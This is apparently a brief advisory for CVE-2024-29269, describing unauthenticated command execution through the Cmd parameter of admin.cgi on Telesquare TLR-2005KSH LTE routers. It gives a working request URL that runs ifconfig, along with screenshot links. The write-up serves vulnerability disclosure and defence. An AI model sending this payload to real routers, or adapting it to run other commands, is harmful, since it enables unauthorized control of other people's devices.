\[CVE ID\] CVE-2024-29269
\[Vulnerability name\] Telesquare TLR-2005KSH Unauthorized Remote Command Execution Vulnerability
\[Description\] Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.
\[Payload\] /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig
\[Vulnerability details\]
1、vulnerability page. [](https://private-user-images.githubusercontent.com/83970507/319011172-3aa1fe1c-7cc1-4e64-9363-22aa346a1e7b.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTgyNzM4NjQsIm5iZiI6MTcxODI3MzU2NCwicGF0aCI6Ii84Mzk3MDUwNy8zMTkwMTExNzItM2FhMWZlMWMtN2NjMS00ZTY0LTkzNjMtMjJhYTM0NmExZTdiLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA2MTMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNjEzVDEwMTI0NFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTFlMThmMThlZjMyYTUwOTM0ZjYwNWExMjI5NmZhMzAyMzUxMzc0NTBlOGM5YWMwY2UwNjFkZTQ0NGM0ZGMzZjEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.rkUGfaoW5kF72PiRbeCm0wo0bFiD2uboTsCl4ztjbnc)
2、Construct the command execution request and successfully execute the system ifconfig command. [](https://private-user-images.githubusercontent.com/83970507/319011556-4f7e151d-6ae2-4437-acda-fdb210a297e0.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTgyNzM4NjQsIm5iZiI6MTcxODI3MzU2NCwicGF0aCI6Ii84Mzk3MDUwNy8zMTkwMTE1NTYtNGY3ZTE1MWQtNmFlMi00NDM3LWFjZGEtZmRiMjEwYTI5N2UwLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA2MTMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNjEzVDEwMTI0NFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQ3YzMzZDMwYTMxNzY5ZDRiY2ZmMzkwNGM4MDA1ZWEzODRkYTRhYWY4ZmE4ZGZhMWNhZDY1YzdhYWJmOWIwODQmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.u9i2x2L0vMYwzM2T14xc9JrzMG8r4JmztcN4c0_1C_0)
京公网安备 11010502034610号
暂无评论